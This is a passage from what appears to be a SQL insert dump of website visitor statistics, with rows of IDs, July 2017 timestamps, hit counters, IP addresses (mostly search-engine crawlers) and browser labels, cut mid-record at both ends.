9516,1499233042,1,1,0,0,'91.196.178.68','firefox'),(129517,1499233069,1,1,0,0,'51.255.65.5','other'),(129518,1499234007,1,1,0,0,'95.108.213.34','other'),(129519,1499234031,1,0,1,0,'66.249.64.155',''),(129520,1499234485,1,0,1,0,'66.249.64.157',''),(129521,1499234700,1,1,0,0,'5.228.75.63','msie'),(129522,1499234702,1,1,0,0,'188.255.20.147','msie'),(129523,1499234742,1,1,0,0,'51.255.65.54','other'),(129524,1499234837,1,1,0,0,'51.255.65.48','other'),(129525,1499235554,1,1,0,0,'51.255.65.86','other'),(129526,1499235590,1,1,0,0,'51.255.65.13','other'),(129527,1499235772,1,1,0,0,'137.74.207.110','other'),(129528,1499237549,1,1,0,0,'51.255.65.63','other'),(129529,1499237643,1,1,0,0,'217.182.132.64','other'),(129530,1499237655,1,1,0,0,'95.108.213.34','other'),(129531,1499238207,1,1,0,0,'51.255.65.65','other'),(129532,1499238356,1,1,0,0,'66.102.9.25','chrome'),(129533,1499238548,1,1,0,0,'217.182.132.173','other'),(129534,1499238554,1,1,0,0,'91.196.178.70','firefox'),(129535,1499238562,1,1,0,0,'109.252.26.76','msie'),(129536,1499238572,2,2,0,0,'216.244.66.246','other'),(129537,1499238619,1,1,0,0,'195.230.130.105','chrome'),(129538,1499238802,1,1,0,0,'91.196.178.69','chrome'),(129539,1499238878,1,1,0,0,'95.108.213.34','other'),(129540,1499238900,3,3,0,0,'216.244.66.194','other'),(129541,1499238925,1,1,0,0,'51.255.65.31','other'),(129542,1499239015,1,1,0,0,'8.29.198.25','other'),(129543,1499239216,1,1,0,0,'91.196.178.68','chrome'),(129544,1499239467,1,1,0,0,'207.46.13.149','other'),(129545,1499239509,1,1,0,0,'91.196.178.97','chrome'),(129546,1499239737,1,1,0,0,'91.209.11.236','other'),(129547,1499240191,1,1,0,0,'51.255.65.39','other'),(129548,1499240271,1,1,0,0,'51.255.65.37','other'),(129549,1499240319,1,1,0,0,'216.244.66.237','other'),(129550,1499240732,1,1,0,0,'217.182.132.88','other'),(129551,1499240780,1,1,0,0,'216.244.66.246','other'),(129552,1499240815,1,1,0,0,'51.255.65.6','other'),(129553,1499240895,1,1,0,0,'164.132.162.157','other'),(129554,1499241012,1,1,0,0,'91.196.178.66','firefox'),(129555,1499241530,1,1,0,0,'95.108.179.15','other'),(129556,1499241933,1,1,0,0,'217.182.132.72','other'),(129557,1499242555,1,1,0,0,'91.192.129.48','firefox'),(129558,1499243428,2,2,0,0,'95.108.213.34','other'),(129559,1499243670,1,0,1,0,'66.249.64.30',''),(129560,1499243992,3,3,0,0,'216.244.66.194','other'),(129561,1499244013,1,1,0,0,'217.182.132.67','other'),(129562,1499244572,7,7,0,0,'80.241.211.185','other'),(129563,1499245167,1,1,0,0,'51.255.65.75','other'),(129564,1499245445,15,15,0,0,'5.9.88.103','other'),(129565,1499245446,1,1,0,0,'66.249.64.157','chrome'),(129566,1499245461,1,0,1,0,'66.249.64.155',''),(129567,1499245655,1,1,0,0,'95.108.213.34','other'),(129568,1499245933,2,2,0,0,'95.108.179.15','other'),(129569,1499246278,1,1,0,0,'91.209.11.236','other'),(129570,1499246406,1,0,1,0,'66.249.64.155',''),(129571,1499247219,1,0,1,0,'68.180.230.48',''),(129572,1499247622,1,1,0,0,'51.255.65.64','other'),(129573,1499248355,2,2,0,0,'216.244.66.246','other'),(129574,1499248598,1,1,0,0,'51.255.65.89','other'),(129575,1499248812,1,1,0,0,'51.255.65.68','other'),(129576,1499249103,1,1,0,0,'94.180.197.77','msie'),(129577,1499249231,1,0,1,0,'66.249.64.30',''),(129578,1499249847,1,1,0,0,'8.29.198.27','other'),(129579,1499249882,1,1,0,0,'95.132.34.23','chrome'),(129580,1499249893,1,1,0,0,'37.54.68.96','chrome'),(129581,1499250131,1,0,1,0,'68.180.230.48',''),(129582,1499250353,1,1,0,0,'217.182.132.76','other'),(129583,1499250463,1,1,0,0,'51.255.65.87','other'),(129584,1499250490,1,1,0,0,'51.255.65.30','other'),(129585,1499251240,1,1,0,0,'91.230.198.34','firefox'),(129586,1499251601,1,1,0,0,'51.255.65.80','other'),(129587,1499251902,2,2,0,0,'216.244.66.246','other'),(129588,1499252317,1,1,0,0,'130.180.219.107','chrome'),(129589,1499253259,1,1,0,0,'51.255.65.67','other'),(129590,1499254143,2,2,0,0,'77.222.134.100','firefox'),(129591,1499255373,1,1,0,0,'95.135.55.200','chrome'),(129592,1499255477,1,1,0,0,'51.255.71.120','other'),(129593,1499255584,2,0,2,0,'68.180.230.48',''),(129594,1499255590,1,1,0,0,'95.108.213.34','other'),(129595,1499255685,1,1,0,0,'91.196.178.166','chrome'),(129596,1499255803,1,1,0,0,'51.255.65.22','other'),(129597,1499256073,1,1,0,0,'109.63.138.58','msie'),(129598,1499256145,1,0,1,0,'66.249.64.155',''),(129599,1499256350,1,1,0,0,'37.54.68.96','chrome'),(129600,1499256408,2,2,0,0,'216.244.66.194','other'),(129601,1499256621,1,0,1,0,'66.249.64.29',''),(129602,1499256909,1,1,0,0,'95.108.213.8','other'),(129603,1499257302,1,1,0,0,'66.249.64.30','chrome'),(129604,1499257932,1,0,1,0,'66.249.64.153',''),(129605,1499258405,1,1,0,0,'51.255.65.16','other'),(129606,1499258614,1,0,1,0,'66.249.64.157',''),(129607,1499258674,1,1,0,0,'178.154.200.37','other'),(129608,1499258678,1,1,0,0,'5.255.253.28','other'),(129609,1499259242,1,1,0,0,'37.53.21.47','chrome'),(129610,1499259675,1,1,0,0,'176.241.154.143','chrome'),(129611,1499260266,1,1,0,0,'91.196.178.68','chrome'),(129612,1499260690,1,1,0,0,'8.29.198.27','other'),(129613,1499261197,1,1,0,0,'51.255.71.121','other'),(129614,1499261215,1,1,0,0,'91.196.178.131','firefox'),(129615,1499261353,1,1,0,0,'66.249.64.28','chrome'),(129616,1499262086,3,3,0,0,'216.244.66.246','other'),(129617,1499262154,1,0,1,0,'66.249.64.155',''),(129618,1499262444,1,1,0,0,'217.182.132.69','other'),(129619,1499262680,2,1,1,0,'66.249.64.157',''),(129620,1499263337,1,1,0,0,'217.182.132.181','other'),(129621,1499263373,1,1,0,0,'91.196.179.138','firefox'),(129622,1499263553,1,1,0,0,'164.132.162.187','other'),(129623,1499263564,1,1,0,0,'51.255.65.47','other'),(129624,1499263731,1,1,0,0,'217.69.133.5','other'),(129625,1499264098,1,1,0,0,'91.196.178.166','chrome'),(129626,1499264417,1,0,1,0,'66.249.64.28',''),(129627,1499264421,1,1,0,0,'51.255.65.30','other'),(129628,1499264479,1,1,0,0,'217.182.132.146','other'),(129629,1499265842,1,1,0,0,'217.182.132.14','other'),(129630,1499265893,1,1,0,0,'217.182.132.156','other'),(129631,1499266541,1,1,0,0,'51.255.65.62','other'),(129632,1499266616,3,3,0,0,'216.244.66.194','other'),(129633,1499266726,1,1,0,0,'217.182.132.5','other'),(129634,1499266747,1,1,0,0,'91.196.178.70','firefox'),(129635,1499267256,1,1,0,0,'37.9.113.38','other'),(129636,1499268043,1,1,0,0,'95.108.213.32','other'),(129637,1499268212,1,0,1,0,'66.249.76.91',''),(129638,1499268283,1,1,0,0,'91.196.178.34','chrome'),(129639,1499269220,1,1,0,0,'23.111.19.150','chrome'),(129640,1499269242,1,1,0,0,'141.8.142.154','other'),(129641,1499269492,1,1,0,0,'37.9.113.5','other'),(129642,1499269621,1,1,0,0,'217.182.132.16','other'),(129643,1499269755,1,1,0,0,'217.182.132.51','other'),(129644,1499270026,1,1,0,0,'40.77.167.105','other'),(129645,1499270030,1,1,0,0,'90.154.83.65','msie'),(129646,1499270179,1,0,1,0,'66.249.76.109',''),(129647,1499271524,1,1,0,0,'8.29.198.26','other'),(129648,1499272103,1,1,0,0,'51.255.65.52','other'),(129649,1499272476,1,1,0,0,'217.182.132.147','other'),(129650,1499272693,1,1,0,0,'217.182.132.72','other'),(129651,1499272819,1,1,0,0,'51.255.65.57','other'),(129652,1499273628,1,1,0,0,'92.113.189.50','chrome'),(129653,1499273727,1,1,0,0,'66.249.76.107','chrome'),(129654,1499273880,1,1,0,0,'66.249.76.108','chrome'),(129655,1499273897,1,1,0,0,'66.249.76.93','chrome'),(129656,1499274034,1,1,0,0,'66.249.66.157','chrome'),(129657,1499274204,2,2,0,0,'66.249.66.74','chrome'),(129658,1499274383,1,1,0,0,'217.69.133.215','other'),(129659,1499274802,1,1,0,0,'51.255.65.67','other'),(129660,1499274804,2,2,0,0,'216.244.66.246','other'),(129661,1499274828,1,1,0,0,'217.182.132.152','other'),(129662,1499274960,1,1,0,0,'95.221.201.50','chrome'),(129663,1499275068,1,1,0,0,'217.182.132.54','other'),(129664,1499275235,1,1,0,0,'109.63.253.9','chrome'),(129665,1499275430,1,0,1,0,'66.249.66.155',''),(129666,1499275532,1,0,1,0,'66.249.76.89',''),(129667,1499275562,1,1,0,0,'51.255.65.30','other'),(129668,1499275621,1,1,0,0,'46.188.32.37','chrome'),(129669,1499275694,1,1,0,0,'217.182.132.184','other'),(129670,1499275789,1,1,0,0,'157.55.39.178','other'),(129671,1499275927,1,1,0,0,'95.221.201.50','chrome'),(129672,1499276279,2,2,0,0,'109.63.253.9','chrome'),(129673,1499276353,1,1,0,0,'51.255.65.66','other'),(129674,1499276687,3,3,0,0,'216.244.66.194','other'),(129675,1499276969,1,1,0,0,'217.182.132.69','other'),(129676,1499277103,1,1,0,0,'93.158.152.79','other'),(129677,1499277119,1,1,0,0,'51.255.65.18','other'),(129678,1499277619,1,1,0,0,'217.182.132.74','other'),(129679,1499277835,2,2,0,0,'216.244.66.246','other'),(129680,1499278604,1,1,0,0,'91.196.178.167','chrome'),(129681,1499278738,1,1,0,0,'51.255.71.133','other'),(129682,1499279662,1,1,0,0,'217.182.132.68','other'),(129683,1499280454,1,1,0,0,'217.182.132.15','other'),(129684,1499280715,1,1,0,0,'217.182.132.176','other'),(129685,1499281269,2,2,0,0,'37.52.31.241','chrome'),(129686,1499281748,1,1,0,0,'137.74.207.116','other'),(129687,1499282113,4,4,0,0,'216.244.66.246','other'),(129688,1499282349,1,1,0,0,'8.29.198.25','other'),(129689,1499282706,1,1,0,0,'217.182.132.181','other'),(129690,1499282885,1,1,0,0,'185.137.19.57','chrome'),(129691,1499282916,1,1,0,0,'217.182.132.86','other'),(129692,1499283757,1,1,0,0,'141.8.142.154','other'),(129693,1499283796,1,1,0,0,'51.255.65.51','other'),(129694,1499284113,1,1,0,0,'51.255.65.94','other'),(129695,1499284132,1,0,1,0,'66.249.76.107',''),(129696,1499284589,1,1,0,0,'216.244.66.246','other'),(129697,1499285146,1,1,0,0,'151.80.27.118','other'),(129698,1499285150,1,1,0,0,'139.59.138.203','other'),(129699,1499286186,1,1,0,0,'51.255.65.68','other'),(129700,1499286272,2,2,0,0,'95.108.179.15','other'),(129701,1499286338,4,4,0,0,'216.244.66.194','other'),(129702,1499286431,3,3,0,0,'151.80.44.115','other'),(129703,1499286547,1,1,0,0,'51.255.65.57','other'),(129704,1499286663,1,1,0,0,'217.182.132.56','other'),(129705,1499288477,1,1,0,0,'157.55.39.178','other'),(129706,1499289029,1,1,0,0,'5.255.253.63','other'),(129707,1499289677,1,1,0,0,'207.46.13.149','other'),(129708,1499289997,1,0,1,0,'66.249.66.157',''),(129709,1499290596,1,1,0,0,'217.182.132.185','other'),(129710,1499290645,1,1,0,0,'207.46.13.149','other'),(129711,1499290723,1,0,1,0,'66.249.76.109',''),(129712,1499291140,1,1,0,0,'40.77.167.105','other'),(129713,1499291318,1,0,1,0,'66.249.76.93',''),(129714,1499291569,1,1,0,0,'95.108.213.34','other'),(129715,1499291829,1,1,0,0,'51.255.71.113','other'),(129716,1499291992,1,1,0,0,'51.255.65.52','other'),(129717,1499292679,1,1,0,0,'51.255.65.85','other'),(129718,1499292931,3,3,0,0,'216.244.66.246','other'),(129719,1499293184,1,1,0,0,'8.29.198.26','other'),(129720,1499293413,1,1,0,0,'217.182.132.177','other'),(129721,1499293432,1,0,1,0,'66.249.76.108',''),(129722,1499293472,1,1,0,0,'157.55.39.142','other'),(129723,1499293626,1,1,0,0,'217.182.132.87','other'),(129724,1499293650,1,1,0,0,'188.32.20.87','chrome'),(129725,1499293768,1,1,0,0,'217.182.132.92','other'),(129726,1499294214,1,0,1,0,'66.249.66.76',''),(129727,1499295270,1,1,0,0,'217.182.132.78','other'),(129728,1499295324,1,1,0,0,'51.255.65.55','other'),(129729,1499295542,1,1,0,0,'217.182.132.50','other'),(129730,1499295592,1,1,0,0,'95.108.179.15','other'),(129731,1499295797,1,1,0,0,'51.255.65.65','other'),(129732,1499296410,1,1,0,0,'216.244.66.246','other'),(129733,1499296708,1,0,1,0,'66.249.76.89',''),(129734,1499296845,1,1,0,0,'164.132.162.160','other'),(129735,1499297061,1,1,0,0,'51.255.65.63','other'),(129736,1499297447,2,2,0,0,'95.108.213.34','other'),(129737,1499297515,1,1,0,0,'51.255.65.59','other'),(129738,1499297574,1,1,0,0,'51.255.65.58','other'),(129739,1499297595,1,1,0,0,'91.196.178.68','chrome'),(129740,1499298047,3,0,3,0,'66.249.76.89',''),(129741,1499298285,1,1,0,0,'176.119.97.113','chrome'),(129742,1499298565,1,0,1,0,'66.249.76.91',''),(129743,1499300315,1,1,0,0,'51.255.65.41','other'),(129744,1499301134,1,1,0,0,'217.182.132.80','other'),(129745,1499301878,1,1,0,0,'217.182.132.170','other'),(129746,1499302158,1,1,0,0,'217.182.132.150','other'),(129747,1499302315,1,1,0,0,'95.108.213.34','other'),(129748,1499302597,1,1,0,0,'51.255.65.76','other'),(129749,1499303412,1,1,0,0,'217.182.132.20','other'),(129750,1499303602,1,1,0,0,'51.255.65.79','other'),(129751,1499304014,1,1,0,0,'8.29.198.27','other'),(129752,1499304285,1,1,0,0,'137.74.201.100','other'),(129753,1499304597,1,1,0,0,'95.108.213.34','other'),(129754,1499305135,1,1,0,0,'51.255.65.47','other'),(129755,1499305439,1,1,0,0,'217.182.132.64','other'),(129756,1499305662,1,1,0,0,'217.182.132.77','other'),(129757,1499305816,1,1,0,0,'217.182.132.177','other'),(129758,1499305975,1,1,0,0,'216.244.66.246','other'),(129759,1499305976,1,0,1,0,'66.249.76.108',''),(129760,1499306063,1,0,1,0,'66.249.76.93',''),(129761,1499306538,2,2,0,0,'216.244.66.194','other'),(129762,1499307265,4,4,0,0,'31.155.169.0','other'),(129763,1499307771,1,1,0,0,'216.244.66.194','other'),(129764,1499308517,1,1,0,0,'51.255.65.75','other'),(129765,1499309188,1,1,0,0,'176.31.231.10','other'),(129766,1499309324,1,1,0,0,'217.182.132.66','other'),(129767,1499309705,1,1,0,0,'51.255.65.35','other'),(129768,1499309760,1,0,1,0,'66.249.76.91',''),(129769,1499309798,1,1,0,0,'51.255.65.75','other'),(129770,1499310002,1,1,0,0,'217.182.132.186','other'),(129771,1499310302,1,1,0,0,'164.132.164.180','other'),(129772,1499311049,1,0,1,0,'66.249.66.156',''),(129773,1499311558,1,1,0,0,'95.108.213.7','other'),(129774,1499312642,1,1,0,0,'180.76.15.28','other'),(129775,1499313095,1,0,1,0,'66.249.76.91',''),(129776,1499313563,1,1,0,0,'51.255.64.106','other'),(129777,1499314133,2,2,0,0,'216.244.66.246','other'),(129778,1499314852,1,1,0,0,'8.29.198.27','other'),(129779,1499315715,1,1,0,0,'51.255.65.17','other'),(129780,1499316023,1,1,0,0,'91.196.178.70','firefox'),(129781,1499316060,1,1,0,0,'54.165.59.7','other'),(129782,1499316198,1,1,0,0,'217.182.132.148','other'),(129783,1499316547,1,1,0,0,'217.182.132.27','other'),(129784,1499317589,1,1,0,0,'51.255.65.36','other'),(129785,1499317759,2,2,0,0,'216.244.66.194','other'),(129786,1499318170,1,1,0,0,'51.255.65.224','other'),(129787,1499318182,1,1,0,0,'180.76.15.6','other'),(129788,1499318309,1,0,1,0,'68.180.230.48',''),(129789,1499318766,1,1,0,0,'217.182.132.71','other'),(129790,1499319057,1,1,0,0,'95.108.213.34','other'),(129791,1499319363,1,1,0,0,'91.196.178.70','firefox'),(129792,1499319425,1,1,0,0,'91.196.178.65','firefox'),(129793,1499319553,1,1,0,0,'51.255.65.32','other'),(129794,1499319902,1,1,0,0,'188.32.7.27','msie'),(129795,1499320036,1,1,0,0,'164.132.162.154','other'),(129796,1499320180,1,0,1,0,'66.249.76.93',''),(129797,1499320478,1,1,0,0,'95.108.213.34','other'),(129798,1499321033,1,1,0,0,'46.118.171.116','firefox'),(129799,1499321075,1,1,0,0,'51.255.65.89','other'),(129800,1499321118,1,1,0,0,'157.55.39.178','other'),(129801,1499321269,2,2,0,0,'91.196.178.72','firefox'),(129802,1499321304,1,1,0,0,'217.182.132.185','other'),(129803,1499321576,1,1,0,0,'130.180.220.45','chrome'),(129804,1499322117,2,2,0,0,'62.210.101.104','other'),(129805,1499322282,3,3,0,0,'46.229.168.69','other'),(129806,1499322299,2,2,0,0,'46.229.168.68','other'),(129807,1499322306,1,0,1,0,'66.249.66.76',''),(129808,1499322327,5,5,0,0,'46.229.168.70','other'),(129809,1499322340,1,0,1,0,'66.249.76.91',''),(129810,1499322344,1,1,0,0,'46.229.168.66','other'),(129811,1499322353,5,5,0,0,'46.229.168.65','other'),(129812,1499322357,1,0,1,0,'66.249.76.89',''),(129813,1499322371,3,3,0,0,'46.229.168.76','other'),(129814,1499322389,6,6,0,0,'46.229.168.75','other'),(129815,1499322414,8,8,0,0,'46.229.168.80','other'),(129816,1499322432,2,2,0,0,'46.229.168.79','other'),(129817,1499322444,1,0,1,0,'66.249.66.75',''),(129818,1499322450,3,3,0,0,'46.229.168.72','other'),(129819,1499322468,7,7,0,0,'46.229.168.73','other'),(129820,1499322511,4,4,0,0,'46.229.168.78','other'),(129821,1499322594,5,5,0,0,'46.229.168.67','other'),(129822,1499322648,2,2,0,0,'46.229.168.74','other'),(129823,1499322773,1,1,0,0,'91.196.178.131','chrome'),(129824,1499322826,1,1,0,0,'46.229.168.77','other'),(129825,1499322969,1,1,0,0,'95.108.179.15','other'),(129826,1499323007,1,1,0,0,'37.52.150.97','chrome'),(129827,1499323101,2,2,0,0,'216.244.66.246','other'),(129828,1499323278,2,2,0,0,'46.229.168.68','other'),(129829,1499323295,1,1,0,0,'46.229.168.65','other'),(129830,1499323358,1,1,0,0,'46.200.100.242','chrome'),(129831,1499323367,2,2,0,0,'46.229.168.72','other'),(129832,1499323397,2,2,0,0,'46.229.168.70','other'),(129833,1499323404,2,2,0,0,'46.229.168.76','other'),(129834,1499323444,1,1,0,0,'46.229.168.80','other'),(129835,1499323458,1,1,0,0,'46.229.168.75','other'),(129836,1499323617,1,1,0,0,'217.69.133.5','other'),(129837,1499323699,1,1,0,0,'207.46.13.23','other'),(129838,1499323781,1,1,0,0,'137.74.207.108','other'),(129839,1499324040,2,2,0,0,'91.196.178.65','chrome'),(129840,1499324297,1,0,1,0,'66.249.76.91',''),(129841,1499324833,2,2,0,0,'216.244.66.194','other'),(129842,1499324995,1,1,0,0,'91.196.178.65','chrome'),(129843,1499325324,1,1,0,0,'51.255.65.65','other'),(129844,1499325602,1,1,0,0,'188.255.23.139','msie'),(129845,1499325681,1,1,0,0,'8.29.198.25','other'),(129846,1499326182,1,1,0,0,'66.102.9.29','chrome'),(129847,1499326184,1,1,0,0,'217.182.132.180','other'),(129848,1499326298,1,0,1,0,'66.249.76.89',''),(129849,1499326449,1,1,0,0,'157.55.39.142','other'),(129850,1499326467,2,2,0,0,'95.108.213.34','other'),(129851,1499326650,1,1,0,0,'92.113.14.227','chrome'),(129852,1499327044,1,1,0,0,'37.54.68.96','chrome'),(129853,1499327193,1,1,0,0,'91.196.178.68','chrome'),(129854,1499327214,1,1,0,0,'216.244.66.246','other'),(129855,1499327554,1,1,0,0,'217.182.132.68','other'),(129856,1499328899,1,1,0,0,'51.255.65.50','other'),(129857,1499329092,1,1,0,0,'91.196.178.165','other'),(129858,1499329226,1,1,0,0,'51.255.65.65','other'),(129859,1499329274,1,1,0,0,'217.69.133.5','other'),(129860,1499329415,1,1,0,0,'141.8.142.154','other'),(129861,1499329480,1,1,0,0,'51.255.65.51','other'),(129862,1499329508,1,1,0,0,'137.74.207.116','other'),(129863,1499329727,1,1,0,0,'91.196.177.46','chrome'),(129864,1499329758,1,1,0,0,'51.255.65.5','other'),(129865,1499330201,1,1,0,0,'217.182.132.150','other'),(129866,1499330322,1,1,0,0,'176.31.231.10','other'),(129867,1499330789,1,0,1,0,'66.249.76.107',''),(129868,1499330825,1,0,1,0,'66.249.76.91',''),(129869,1499330977,1,1,0,0,'217.182.132.64','other'),(129870,1499331197,1,0,1,0,'66.249.76.93',''),(129871,1499332069,1,1,0,0,'51.255.65.43','other'),(129872,1499332252,2,2,0,0,'216.244.66.194','other'),(129873,1499332260,1,1,0,0,'217.182.132.174','other'),(129874,1499332774,1,1,0,0,'91.196.178.68','chrome'),(129875,1499333544,1,1,0,0,'216.244.66.246','other'),(129876,1499333715,3,3,0,0,'5.9.144.195','other'),(129877,1499333763,1,1,0,0,'91.196.178.68','chrome'),(129878,1499334283,1,0,1,0,'66.249.76.93',''),(129879,1499334747,1,1,0,0,'91.196.178.163','chrome'),(129880,1499334806,1,1,0,0,'217.182.132.61','other'),(129881,1499334944,2,2,0,0,'217.69.133.6','other'),(129882,1499334950,1,1,0,0,'217.69.133.4','other'),(129883,1499335032,1,1,0,0,'217.69.133.3','other'),(129884,1499335467,1,1,0,0,'51.255.71.130','other'),(129885,1499335689,1,1,0,0,'51.255.65.30','other'),(129886,1499336120,1,1,0,0,'51.255.65.75','other'),(129887,1499336306,2,2,0,0,'95.108.213.34','other'),(129888,1499336511,1,1,0,0,'8.29.198.26','other'),(129889,1499336533,1,1,0,0,'217.182.132.240','other'),(129890,1499336959,1,1,0,0,'46.164.155.50','chrome'),(129891,1499337323,1,1,0,0,'217.182.132.156','other'),(129892,1499337572,1,0,1,0,'66.249.76.93',''),(129893,1499337747,1,1,0,0,'188.166.87.191','firefox'),(129894,1499337756,1,1,0,0,'164.132.162.188','other'),(129895,1499337902,1,1,0,0,'157.55.39.142','other'),(129896,1499338796,1,1,0,0,'185.117.241.173','chrome'),(129897,1499338965,1,1,0,0,'95.108.213.34','other'),(129898,1499339157,1,1,0,0,'91.196.178.67','firefox'),(129899,1499339438,1,1,0,0,'66.249.76.108','chrome'),(129900,1499339620,2,2,0,0,'216.244.66.194','other'),(129901,1499339659,1,1,0,0,'157.55.39.178','other'),(129902,1499339804,1,1,0,0,'91.196.177.147','chrome'),(129903,1499339868,1,1,0,0,'157.55.39.142','other'),(129904,1499340338,1,1,0,0,'51.255.65.24','other'),(129905,1499340637,1,1,0,0,'51.255.65.83','other'),(129906,1499340764,1,1,0,0,'216.244.66.246','other'),(129907,1499340871,1,1,0,0,'217.69.133.4','other'),(129908,1499340887,1,1,0,0,'217.69.133.203','other'),(129909,1499341083,1,1,0,0,'212.113.47.49','chrome'),(129910,1499341084,1,1,0,0,'51.255.71.131','other'),(129911,1499341173,1,1,0,0,'51.255.65.17','other'),(129912,1499341218,1,0,1,0,'66.249.76.91',''),(129913,1499341583,1,1,0,0,'141.8.142.154','other'),(129914,1499341726,1,0,1,0,'66.249.76.93',''),(129915,1499342692,1,1,0,0,'217.182.132.6','other'),(129916,1499342818,1,1,0,0,'216.244.66.237','other'),(129917,1499343002,1,1,0,0,'95.108.213.34','other'),(129918,1499343133,1,0,1,0,'66.249.76.91',''),(129919,1499343199,1,1,0,0,'31.43.19.214','chrome'),(129920,1499343216,1,1,0,0,'207.46.13.23','other'),(129921,1499343224,1,1,0,0,'37.52.22.188','firefox'),(129922,1499343617,1,1,0,0,'91.196.177.147','chrome'),(129923,1499343986,1,1,0,0,'217.182.132.52','other'),(129924,1499344210,1,1,0,0,'217.182.132.153','other'),(129925,1499344776,1,1,0,0,'217.182.132.87','other'),(129926,1499344825,1,1,0,0,'217.182.132.29','other'),(129927,1499344905,1,1,0,0,'217.182.132.76','other'),(129928,1499345223,1,1,0,0,'51.255.71.120','other'),(129929,1499345430,1,1,0,0,'37.52.23.108','chrome'),(129930,1499345695,1,1,0,0,'217.182.132.157','other'),(129931,1499346512,1,1,0,0,'217.182.132.56','other'),(129932,1499346693,2,2,0,0,'217.69.133.6','other'),(129933,1499346694,1,1,0,0,'217.69.133.203','other'),(129934,1499347011,1,1,0,0,'137.74.207.188','other'),(129935,1499347155,1,1,0,0,'95.108.179.15','other'),(129936,1499347280,1,1,0,0,'141.8.142.154','other'),(129937,1499347338,1,1,0,0,'91.196.178.68','chrome'),(129938,1499347339,1,1,0,0,'8.29.198.26','other'),(129939,1499347600,1,1,0,0,'217.182.132.176','other'),(129940,1499347978,1,1,0,0,'216.244.66.237','other'),(129941,1499348353,1,1,0,0,'91.196.178.68','chrome'),(129942,1499348600,1,1,0,0,'151.80.27.116','other'),(129943,1499348684,1,1,0,0,'217.182.132.31','other'),(129944,1499348927,1,1,0,0,'216.244.66.246','other'),(129945,1499349074,1,1,0,0,'37.55.150.210','firefox'),(129946,1499349278,1,1,0,0,'51.255.71.115','other'),(129947,1499349349,1,1,0,0,'91.196.178.65','chrome'),(129948,1499349606,1,1,0,0,'180.76.15.13','other'),(129949,1499349798,1,1,0,0,'51.255.65.23','other'),(129950,1499350569,1,1,0,0,'95.108.179.15','other'),(129951,1499350802,1,1,0,0,'217.182.132.79','other'),(129952,1499350890,2,2,0,0,'216.244.66.246','other'),(129953,1499351188,1,1,0,0,'217.182.132.85','other'),(129954,1499351196,1,1,0,0,'217.182.132.51','other'),(129955,1499351214,1,0,1,0,'66.249.76.89',''),(129956,1499352172,1,1,0,0,'51.255.65.94','other'),(129957,1499352181,1,1,0,0,'217.182.132.188','other'),(129958,1499352676,1,1,0,0,'217.182.132.74','other'),(129959,1499353172,2,0,2,0,'66.249.76.91',''),(129960,1499354009,2,2,0,0,'217.182.132.31','other'),(129961,1499354087,1,1,0,0,'37.55.226.10','chrome'),(129962,1499354802,1,1,0,0,'51.255.65.80','other'),(129963,1499354847,1,0,1,0,'66.249.76.107',''),(129964,1499355296,1,1,0,0,'180.76.15.145','other'),(129965,1499355354,1,1,0,0,'217.182.132.240','other'),(129966,1499355400,1,1,0,0,'157.55.39.178','other'),(129967,1499355699,1,1,0,0,'209.90.225.226','chrome'),(129968,1499355811,1,1,0,0,'51.255.65.58','other'),(129969,1499355877,1,1,0,0,'178.154.200.37','other'),(129970,1499356070,1,1,0,0,'217.182.132.184','other'),(129971,1499356677,1,0,1,0,'66.249.76.93',''),(129972,1499357090,1,1,0,0,'51.255.71.131','other'),(129973,1499357406,1,1,0,0,'217.182.132.187','other'),(129974,1499357930,1,1,0,0,'51.255.65.57','other'),(129975,1499357985,1,1,0,0,'217.182.132.80','other'),(129976,1499358168,1,1,0,0,'8.29.198.26','other'),(129977,1499358317,2,2,0,0,'217.69.133.5','other'),(129978,1499358323,1,1,0,0,'217.69.133.9','other'),(129979,1499358556,1,1,0,0,'217.182.132.240','other'),(129980,1499358581,1,1,0,0,'90.154.83.65','msie'),(129981,1499358739,4,4,0,0,'216.244.66.246','other'),(129982,1499359154,1,1,0,0,'217.182.132.186','other'),(129983,1499359398,1,1,0,0,'109.162.70.66','firefox'),(129984,1499359417,1,1,0,0,'217.182.132.82','other'),(129985,1499359645,1,1,0,0,'164.132.162.156','other'),(129986,1499359816,1,1,0,0,'51.255.65.71','other'),(129987,1499359942,1,1,0,0,'217.182.132.240','other'),(129988,1499360545,1,1,0,0,'51.255.65.15','other'),(129989,1499360936,2,2,0,0,'216.244.66.194','other'),(129990,1499360983,2,2,0,0,'95.108.213.34','other'),(129991,1499361035,1,1,0,0,'95.108.179.15','other'),(129992,1499361517,1,1,0,0,'217.182.132.78','other'),(129993,1499361801,1,1,0,0,'77.121.38.147','chrome'),(129994,1499361810,1,1,0,0,'217.182.132.30','other'),(129995,1499361965,1,1,0,0,'95.108.213.34','other'),(129996,1499362339,2,2,0,0,'216.244.66.246','other'),(129997,1499362378,1,1,0,0,'164.132.162.155','other'),(129998,1499362609,2,2,0,0,'216.244.66.194','other'),(129999,1499362673,1,1,0,0,'217.182.132.56','other'),(130000,1499363122,1,1,0,0,'51.255.71.110','other'),(130001,1499363161,1,1,0,0,'51.255.65.53','other'),(130002,1499363299,1,1,0,0,'217.182.132.80','other'),(130003,1499363362,1,1,0,0,'51.255.64.106','other'),(130004,1499363767,1,1,0,0,'217.182.132.178','other'),(130005,1499363861,1,1,0,0,'91.209.11.236','other'),(130006,1499364482,1,1,0,0,'217.182.132.147','other'),(130007,1499364611,1,1,0,0,'95.108.213.8','other'),(130008,1499366397,1,1,0,0,'51.255.71.121','other'),(130009,1499366528,1,1,0,0,'51.255.65.95','other'),(130010,1499367361,1,1,0,0,'51.255.65.58','other'),(130011,1499367375,1,1,0,0,'164.132.162.153','other'),(130012,1499367940,1,1,0,0,'51.255.65.48','other'),(130013,1499368233,1,1,0,0,'216.244.66.237','other'),(130014,1499368296,1,1,0,0,'217.182.132.30','other'),(130015,1499368404,1,0,1,0,'66.249.76.93',''),(130016,1499369004,1,1,0,0,'8.29.198.27','other'),(130017,1499369397,3,3,0,0,'216.244.66.246','other'),(130018,1499369919,1,1,0,0,'217.69.133.9','other'),(130019,1499369938,1,1,0,0,'217.182.132.188','other'),(130020,1499370080,1,1,0,0,'176.31.231.10','other'),(130021,1499370109,1,1,0,0,'217.182.132.79','other'),(130022,1499371292,1,1,0,0,'217.182.132.28','other'),(130023,1499371542,1,1,0,0,'217.182.132.32','other'),(130024,1499371558,1,1,0,0,'51.255.71.123','other'),(130025,1499371747,1,1,0,0,'51.255.65.84','other'),(130026,1499372134,1,1,0,0,'217.182.132.84','other'),(130027,1499372227,2,2,0,0,'216.244.66.194','other'),(130028,1499372898,1,1,0,0,'95.108.213.34','other'),(130